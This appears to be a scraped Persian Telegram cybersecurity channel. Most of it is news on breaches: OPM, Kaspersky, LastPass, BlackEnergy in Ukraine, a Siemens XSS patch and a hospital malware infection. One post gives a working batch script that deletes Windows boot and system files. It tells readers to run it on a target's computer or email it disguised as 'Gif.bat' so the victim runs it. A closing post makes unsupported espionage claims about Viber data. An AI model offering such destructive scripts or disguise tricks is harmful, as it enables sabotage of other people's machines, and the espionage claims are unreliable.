کانال تخصصی امنیت سایبری «کتاس»
1.74K subscribers
1.3K photos
302 videos
109 files
3.07K links
تماس با ادمين📧:
ict.sec@outlook.com

این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
Download Telegram
۱📌) نفوذ هکرهای چینی به اطلاعات پرسنل نظامی و اطلاعاتی آمریکا

در ماه ژوئن ۲۰۱۵ نفوذگران چینی با هک کردن سیستم‌های کامپیوتری دفتر مدیریت پرسنلی آمریکا (OPM) توانستند داده‌های حساس و مهم مرتبط با مدارک و "تاییدیه‌های امنیتی" میلیون‌ها نفر از کارکنان سرویس‌های نظامی، اطلاعاتی و جاسوسی ایالات متحده را بربایند.

این ماجرا به بزرگ‌ترین نفوذ امنیتی به داده‌های دولتی در تاریخ آمریکا موسوم شد و در جریان آن اطلاعات بیش از ۲۱ میلیون نفر از کارکنان دولت ربوده شد. برخی از مقام‌های دولت آمریکا انگشت اتهام را به سوی دولت چین نشانه گرفتند، اما دولت چین با رد این اتهامات گفت که این عملیات کار مجرمان سازمان‌یافته بوده است.
—-------
💡در زمینه امنیت سایبری با شما خواهیم بود.
دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
📌2- نفوذ به متخصصان نفوذ؛ حمله هکرها به کسپرسکی

کمپانی کسپرسکی، مستقر در مسکو، یکی از مهم‌ترین کمپانی‌های امنیت دیجیتال و تولید آنتی‌ویروس در جهان است که صدها متخصص زبده از سراسر جهان در آن مشغول کارند. گروهی از هکرها که گفته می‌شود احتمالا از طراحان "استاکس‌نت" و "دیوکیو" بوده‌اند، شبکه این کمپانی امنیتی را هدف قرار دادند تا اطلاعاتی که این کمپانی از حملات سایبری تحت حمایت دولت‌ها در اختیار دارد را بربایند.
—-------
💡در زمینه امنیت سایبری با شما خواهیم بود.
دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
📌3- نفوذ به ایمیل‌های شخصی رئیس سازمان اطلاعات مرکزی آمریکا

در دنیایی که کمپانی‌های امنیتی و متخصصان هک و نفوذ هم قربانی حملات سایبری می‌شوند، هیچ‌کسی در برابر حمله مصون نیست. در ماه اکتبر، هکری ناشناس که خود را "دانش‌آموز" معرفی کرده بود، اعلام کرد که به ایمیل شخصی جان برنان، رئیس سیا، نفوذ کرده و اطلاعات محرمانه دولتی و شخصی او را ربوده است.

این هکر اقدام خود را "واکنشی به سیاست خارجی آمریکا" خواند و گفت که با انگیزه‌های سیاسی به این کار دست زده تا دولت آمریکا را رسوا کند. اندکی بعد مشخص شد که این اقدام کار گروهی از هکرها بوده که با تکنیک‌های ساده "مهندسی اجتماعی" توانستند به اطلاعات خصوصی جان برنان دست پیدا کنند.
—-------
💡در زمینه امنیت سایبری با شما خواهیم بود.
دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
📌4- نفوذ به "لست‌پَس"؛ سرویس امن ذخیره‌سازی پسوردها

سرویس "LastPass" یکی از محبوب‌ترین برنامه‌های تولید و ذخیره‌سازی رمزهای عبور امن است، اما این سرویس امنیتی هم در سال ۲۰۱۵ قربانی حملات هکرها شد. نفوذگران با حمله به شبکه "لست‌پس" به انبوهی از آدرس‌های ایمیل و پسوردهای رمزگذاری‌شده و عباراتی که کاربران برای یادآوری پسوردها تعیین کرده بودند، دست یافتند.

مسئولان این کمپانی گفته‌اند که از روش‌های پیچیده‌ای برای رمزگذاری داده‌ها و "مَسترپسورد"های کاربران استفاده می‌کردند، اما با این حال تاکید کردند که اگر پسوردهای اصلی کاربران رمزهای ساده‌ای بوده باشد، احتمالا هکرها می‌توانند با شکستن آنها به مجموعه داده‌های محرمانه آنها دست پیدا کنند. اگر از سرویسی مانند "لست‌پس" استفاده می‌کنید، حتما عبارت پیچیده‌ای متشکل از حروف بزرگ و کوچک و اعداد و نشانه‌ها را به عنوان پسورد اصلی تعیین کنید تا قربانی ساده حملات مشابه نباشید.
—-------
💡در زمینه امنیت سایبری با شما خواهیم بود.
دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
📌با پریسا تبریز، «شاهزاده امنیت» گوگل آشنا شوید

فعالیت در عرصه تکنولوژی سایبری چیزی نبوده که پریسا تبریز از همان کودکی در مسیرش گام برداشته باشد. او که تازه در زمان کالج برای نخستین بار با کامپیوتر کار کرده، حالا در ۳۱ سالگی "شاهزاده امنیت" کمپانی گوگل لقب گرفته است.
"شاهزاده امنیت" لقب رسمی پریسا تبریز، مسئول امنیت اطلاعات بنگاه گوگل است. او زیاد اهل مصاحبه نیست و شمار عکس‌هایی که از او در اینترنت پیدا می‌شود، کمتر از انگشتان یک دست است. نشریه معتبر فوربس، سال گذشته پریسا تبریز را در میان یکی از ۳۰ چهره‌موفق زیر ۳۰ سال در عرصه فناوری در کنار مارک زاکربرگ، پایه‌گذار فیس‌بوک، جای داد.
به تازگی خبرنگار مجله "ELLE" به دیدار این کارمند ارشد گوگل، در مقر این کمپانی در کالیفرنیا رفته و با وی گفت‌وگویی انجام داده است. گفت‌وگو در سالن کنفرانس گوگل انجام شده، چون طبق قوانین گوگل خبرنگاران اجازه ورود به ساختمانی را که پریسا تبریز در آن کار می‌کند، ندارند. در تمام مدت گفت‌وگو نیز یک محافظ این خبرنگار را همراهی می‌کرده؛ حتی هنگام رفتن به دستشویی.
پریسا تبریز، ۳۱ ساله، در حومه شهر شیکاگو بزرگ شده است؛ مادرش پرستاری آمریکایی − لهستانی و پدرش یک پزشک مهاجر ایرانی است. او در سال ۲۰۰۷ به استخدام گوگل درآمد و دهمین عضو تیم کوچکی از هکرها در این کمپانی شد. وظیفه این تیم در یک کلام تأمین امنیت نرم‌افزارهای گوگل بود. اما اکنون این تیم گسترش یافته و بیش از ۲۵۰ متخصص امنیتی در گوگل مشغول به کار هستند.
پریسا تبریز آن طور که خود می‌گوید، در دوران کالج برای نخستین بار با کامپیوتر کار کرده و تا آن موقع وقتش را با هنر، ورزش و رقابت با دو برادرش سپری می‌کرده است. او که در ریاضی و علوم استعداد داشته، سپس وارد دانشگاه ایلی‌نوی شده و اندکی بعد نیز علاقه به امور کامپیوتری در او بیدار می‌شود.
مقاومت در برابر وسوسه پول
پریسا تبریز به گروه هکرهای "کلاه سفید" تعلق دارد که در مقابل هکرهای "کلاه سیاه" قرار دارند. کلاه سفید‌ها به سیستم‌ها نفوذ می‌کنند، اما از این نفوذ نیت بدی ندارند و هدفشان بررسی امنیت سیستم، شناسایی خلاء‌های امنیتی و ارتقای استحکام سیستم است. او توضیح می‌دهد که برای استخدام به دنبال ‌آنهایی باید باشند که توانایی رخنه به بهترین‌سیستم‌ها را داشته باشند، اما در عین حال اینقدر از نظر شخصیتی قوی باشند که بتوانند در مقابل وسوسه پول مقاومت کنند و خریدنی نباشند.
در حال حاضر شرکت‌ها به کسانی که قادر به یافتن باگ‌ها در سیستم باشند و آنها را گزارش دهند، پول پرداخت می‌کنند. برای مثال این مبلغ نزد گوگل، آن طور که خانم تبریز می‌گوید، از ۲۵ هزار تا ۶۰ هزار دلار متغیر است.
طبق گزارش مجله "ELLE" بخشی که پریسا تبریز ریاست آن را بر عهده دار‌د، بیش از ۳۰ هکر در اروپا و آمریکا را شامل می‌شود که کارشان بررسی تهدیدات امنیتی به طور ویژه مربوط به موتور جستجوی گوگل کروم است.
همین تیم بود که در سال ۲۰۱۱ متوجه هک شدن شرکت هلندی "دیجی نوتار" شد. هکرها در این حمله موفق به ربودن گواهینامه‌های امنیتی دیجیتال این شرکت و صدور گواهینامه‌های جعلی شده بودند و به این ترتیب حساب جی‌میل صدها هزار کاربر ایرانی را هک کردند.
پریسا تبریز با نگاهی به آینده از کم‌رنگ‌شدن اهمیت "رمز عبور" خبر می‌دهد. به گفته او ورود به کامپیوترها و حساب‌های کاربری از راه‌های فیزیکی صورت می‌گیرد، نظیر اثر انگشت که هم اکنون آیفو‌ن از آن بهره‌می‌گیرد و این تازه آغاز راه است.—-------
💡در زمینه امنیت سایبری با شما خواهیم بود.
دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
🔴چگونه یک کامپیوتر را به راحتی از کار بیاندازیم
کافی است مجموعه کد های زیر را در نرم افزاری مانند نوت پد وارد و با نام hackpc.bat ذخیره نمایید. پسوند .bat برای نام فایل ضروريست:
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
سپس این فایل را در کامپیوتر مورد نظر اجرا کنید.یا
اینکه توسط ایمیلی به فرد موردنظر ارسال کنید کافیست نام فایل را به Gif.bat تغییر داده و فرد موردنظر به خیال عکس بودن روی فایل کلیک کرده و کد اجرا شود.
🚨🚨🚨به یاد داشته باشید که هیچ وقت این کدها را روی کامپیوتر خودتان اجرا نکنید.
.......
در زمینه امنیت سایبری با شما خواهیم بود.
دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
🚨🚨 زیمنس وصله امنیتی برای محصولات اتوماسیون ساختمان ارائه داد
زیمنس به روز رسانی سیستم عامل برای رسیدگی به آسیب پذيري(XSS) موثر بر برخی از محصولات اتوماسیون ساختمان را منتشر کرد.

با توجه به اطلاعیه زیمنس، نقص وب سرور OZW به Synco و سایر محصولات یکپارچه برای نظارت از راه دور و کنترل دستگاه های عامل ساخت و ساز، مانند آنهایی که برای گرمایش و تهویه مطبوع استفاده میشود تاثیر می گذارد.

حفره امنیتی، به عنوان CVE-2016-1488 شناسایی، OZW672 و OZW772 ماژول های ارتباطات در حال اجرا سیستم عامل قبل از نسخه 6.00 تاثیر می گذارد. یک مهاجم می تواند آسیب پذیری با فریب کاربر به هدف قرار کلیک بر روی لینک های دستکاری شده بهره برداری.

آدیتیا سود، محقق اعتبار برای پیدا کردن و گزارش نقص XSS، گفت: اشکال در صفحه ورود به سایت در OZW672 و OZW772 تعبیه شده به وب سرور تاثیر می گذارد. و مهاجم می تواند با این ضعف به تغییر مسیر کاربران به وب سایت های فیشینگ، سرقت اطلاعات، و یا آنها را به دانلود نرم افزارهای مخرب بر روی دستگاه های خود مورد سوئ استفاده قرار گیرد.
لازم بدکردار است این آسیب پذیری به زیمنس از طریق ICS-CERT در 2015 ژوئن 10 گزارش شده است، اما پس از نزدیک به 7 ماه فروشنده به انتشار یک وصله اقدام کرده است. این نقص می تواند یک خطر جدی درصورت موفقیت به بهره برداری در برخواهد داشت.
"مهاجم می تواند به سادگی کاربر را فریب و هدف قراردهد با کلیک بر روی لینک صفحه وب، که به طور خودکار فرم HTTP باعث اجراي اسکریپت در مرورگر کاربرشود، که می تواند در دانلود از نرم افزارهای مخرب بر روی سیستم کاربر نهایی مورد بهره قرار گیرد.همچنین، ممکن است به آلوده شدن ماشین هایی که به عنوان بخشی از محیط SCADA استفاده می شود بیانجامد."

حملاتی که در آن سیستم های SCADA مورد هدف قرار میگیرند به طور فزاینده شایع است.حوادث اخیر در بخش انرژی اوکراین یک مثال کامل برای آسیب از یک حمله سایبری موفق می تواند باشد.
.......
💡در زمینه امنیت سایبری با شما خواهیم بود.
دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
خبر : Windows Bridge(ابزار پورت کردن اپلیکشن های ios به ویندوز) به صورت Open Source منتشر شد!

چندی پیش مایکروسافت در کنفرانس بیلد 2015 یک پیش نمایش از Windows Bridg برای ios را ارائه کرد که به صورت Open Source منتشر شد. در واقع این ابزار قبلا با اسم پروژه Islandwood استفاده می شد اما در حال حاضر نام آن به Windows Bridge برای ios تغییر کرده که به صورت پیش نمایش ارائه شده است

http://barnamenevisan.org/Articles/Article4476.html
📌موج جدیدی از حملات سایبری علیه صنعت برق اوکراین
(20 و 21 ژانویه 2016)
در دور جدیدی از حملات، نیروگاههای برق اوکراین مورد حمله سایبری قرار گرفتند، اینبار از طریق malware که بر پایه تروجان منبع باز و آزادانه در دسترس که هیچ کس انتظار آن را نداشته اتفاق افتاده است. این malware سعی نموده است که به سیستم خرید از طریق یک فایل XLS اکسل مخرب بصورت فریب فیشنگ در ضمیمه یک ایمیل دست پیداکند.
نام این تروجان BlackEnergy می باشد برای کسب اطلاعات بیشتر به آدرس های زیر مراجعه نمایید:
http://www.theregister.co.uk/2016/01/21/ukraine_energy_utilities_attacked_again_with_open_source_trojan_backdoor/
http://www.scmagazine.com/new-wave-of-attacks-on-ukrainian-power-plants/article/466473/
http://thehill.com/policy/cybersecurity/266603-security-researcher-ukraine-power-grid-facing-new-wave-of-cyberattacks
.......
💡در زمینه امنیت سایبری با شما خواهیم بود.
دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/joinchat/BaPoBjumXnCYx_E1GT62pw
📌سازنده قطعات هواپیمایی ایرباس،مبلغ $ 54M را در سرقت سایبری از دست داد
یک شرکت مهندسی اتریشی پس از اعتراف به ضعف امنیتی IT به دنبال "سرقت سایبری" اعلام کرد هزینه کسری حسابهایش مبلغ $ 54M بوده است
گروه عملیاتی FACC که قطعات هواپیما برای غولهای هواپیمایی مانند بوئینگ و ایرباس می سازد، و اکثریت سهام آن متعلق به یک شرکت سهامی چینی است. اصرار دارد در این نفوذ سرورهای مالکیت معنوی، مهندسی، و عملیات در معرض خطر نبوده اند، و صرفا از لحاظ مالی متضرر شده است.
شرکت در بیانیه ای گفت: "گروه حسابداری مالی گروه عملیاتی FACC هدف تقلب سایبری قرار گرفته است. زیرساختهای FACC IT، امنیت داده ها، IPها و همچنین کسب و کار عملیاتی گروه توسط فعالیت های جنایی سایبری تحت تاثیر قرار نگرفته است. و آسیب وارده صرفا خروج حدود 50 میلیون یورو از بودجه در جریان است. هیئت مدیره اقدامات ساختاری فوری درنظر گرفته است و درحال ارزیابی خسارات و مطالبات بیمه میباشد."
تحقیقات اولیه و شواهد موجود حاکی از نفوذ از درون توسط افراد ناشناس است که مدیریت کل سیستم های حفاظت و سیستم های پرداخت الکترونیکی را دردست گرفته و باعث انحراف مسیر مقدار زیادی از پول نقد شده اند.
پلیس اتریش در حال بررسی، سرور های مالی شرکت برای پیدا کردن مجرمان است. این کاوش ها ممکن است ماه ها طول بکشد.
در پی انتشار این خبر قیمت سهام FACC تقریبا 20 درصد کاهش یافت.
آدرس خبر :
http://www.theregister.co.uk/2016/01/22/austrian_firm_loses_54m_hacking_attack/
.......
💡در زمینه امنیت سایبری با شما خواهیم بود.
دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/Information_security_management
📌 آلودگی ویندوز ایکس پی کامپیوترهای بیمارستان ملبورن استرالیا با تروجان
(ژانویه 2016)
کامپیوترهای بخش پاتولوژی بیمارستان سلطنتی ملبورن در ویکتوریا، استرالیا با نرم افزارهای مخرب در هفته گذشته آلوده شدند. بانک خون به روش های دستی برای پردازش نمونه بازگشته است و پاسخ مراجعان را بصورت تلفنی صرفا ارائه میکند و سیستم های آنلاین این بخش از کار افتاده اند. این موضوع بر رایانه های شخصی با سیستم عامل ویندوز XP تاثیر می گذارد.
برای اطلاعات تکمیلی به ادرسهای زیر مراجعه نمایید:
http://www.theage.com.au/victoria/royal-melbourne-hospital-attacked-by-damaging-computer-virus-20160118-gm8m3v.html
http://www.theregister.co.uk/2016/01/19/melbourne_hospital_pathology_wing_splattered_by_virus/
.......
💡در زمینه امنیت سایبری با شما خواهیم بود.
دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/Information_security_management
📌دولت اوکراین ، روسیه برای حمله سایبری به فرودگاه سرزنش نمود
(2016 ژانویه 18)
پس از شناسایی نرم افزار مخرب انرژی سیاه در شبکه کامپیوتری فرودگاه Boryspil در کیف، اوکراین، دولت این کشور می گوید که مظنون است که روسیه مسئول این کار است. تیم واکنش اضطراری رایانه ای اوکراین (CERT-UA) هشدارداده است که می تواند حملات دیگری نیزاز این نوع به وقوع بپیوندد. انرژی سیاه نرم افزارهای مخربی است که بر روی سیستم های در سه شرکت تولید برق اوکراین در اواخر سال گذشته میلادی کشف شد. CERT-UA به مدیران سیستم ها توصیه مینماید فایل های ثبت ورود به سیستمها را برای تشخیص فعالیت های غیر عادی بررسی نمایند. برای اطلاعت بیشتر :
http://www.scmagazine.com/ukraine-blames-russia-for-cyber-attack-on-airport/article/465675/
http://www.theregister.co.uk/2016/01/18/blackenergy_power_outage_malware_kiev_airport/
http://www.irishtimes.com/news/world/europe/ukraine-blames-russian-hackers-for-airport-attack-1.2501363
.......
💡در زمینه امنیت سایبری با شما خواهیم بود.
دریافت آخرین توصیه های امنیت اطلاعات در کانال
@information_security_management 👈 join 👇
https://telegram.me/Information_security_management
https://telegram.me/Information_security_management
آدرس بالا را به دوستان خود برای عضویت در این گروه معرفی کنيد
دراین کانال راجع به امنیت در حوزه فناوری اطلاعات و سیستمهای موبایل و کامپیوترهای شخصی پرداخته خواهد شد.
https://telegram.me/Information_security_management
آدرس بالا را به دوستان خود برای عضویت در این گروه معرفی کنيد
دراین کانال راجع به امنیت در حوزه فناوری اطلاعات و سیستمهای موبایل و کامپیوترهای شخصی پرداخته خواهد شد.
مراقب باشید و لینک سایت «کرش سافاری دات کام» را باز نکنید، چون باعث کرش کردن مرورگر شما می‌شود و شاید شما را مجبور کند که گوشی‌تان را خاموش و روشن کنید!

شاید تا یکی دو روز دیگر، کاربران ایرانی هم دست به شیطنت بزنند و لینک‌ سایتی را برای شما بفرستند که مراجعه به آن مساوی است با کرش کردن مرورگر سافاری یا کروم شما. باز کردن این سایت حتی ممکن است شما را مجبور کنید که گوشی خود را ری‌بوت کنید!

قضیه این است که سایت به نام crashsafari دات کام درست شده و در آن تنها ۴ خط کد قرار داده شده است. باز کردن این است حتی می‌تواند مرورگرهای دسکتاپ را در سیستم‌هایی که میزان رم و قدرت پردازشگر پایین دارند، دچار مشکل کند و باعث کرش آنها بشود.
1pezeshk.com/archives/2016/01/sending-a-single-link-can-cause-anyones-smartphone-to-crash.html
عضویت:
https://telegram.me/Information_security_management
راجع به امنیت در حوزه فناوری اطلاعات و سیستمهای موبایل و کامپیوترهای شخصی با شما خواهیم بود.
اگر بخواهیم فضای سایبر را از بعد امنیت ملی و امنیت خارجی کشور بررسی کنیم باید به این نکته توجه داشت که چرا در این چند ساله اخیر موج دستگیری جاسوسان در کشور ما به حداقل ممکن رسیده است. با کمی تامل می توان به این نکته رسید که این جاسوسی ها عمدتا از طریق فضای مجازی صورت می گیرد. ویروس استکس نت یا موارد مشابه آن تنها بخش کوچکی از حملات جاسوسی می باشد. آمارهای منتشره از سوی سازمان پدافند غیر عامل گویای این واقعیت است. اما آیا اطلاعات من و شما به درد سرویس های خارجی می خورد یا خیر. با ذکر یک مثال به این سوال پاسخ می دهیم.
مثلا شما در گوشی تلفن همراه خود شماره تلفن یکی از اعضای نهادهای نظامی کشور را دارید و به وضوح نام او را در گوشی همراه خود ثبت کرده اید مثلا آقای اکبری سپاه. واضع است که شما وقتی نرم افزار وایبر را روی گوشی خود نصب می کنید به شما می گوید که یک کپی از اطلاعات گوشی همراه شما در مکان امنی نگهداری می شود اما این که این مکان امن کجاست نمی دانیم. در نهایت با توجه به هکتارها سروری که در کشورهایی مثل آمریکا و اسراییل نصب شده است، آنها با یک سرچ ساده در این سروها می توانند آنچه را که می خواهند پیدا کنند. مثلا کلمات سپاه را سرچ می زنند و از طریق تلفن همراه این افراد به تلفن همراه مسئولین و مراکز نظامی و... دسترسی پیدا می کنند.
منبع کتاب آسیب شناسی فضای مجازی
عضویت:
https://telegram.me/Information_security_management
راجع به امنیت در حوزه فناوری اطلاعات و سیستمهای موبایل و کامپیوترهای شخصی با شما خواهیم بود.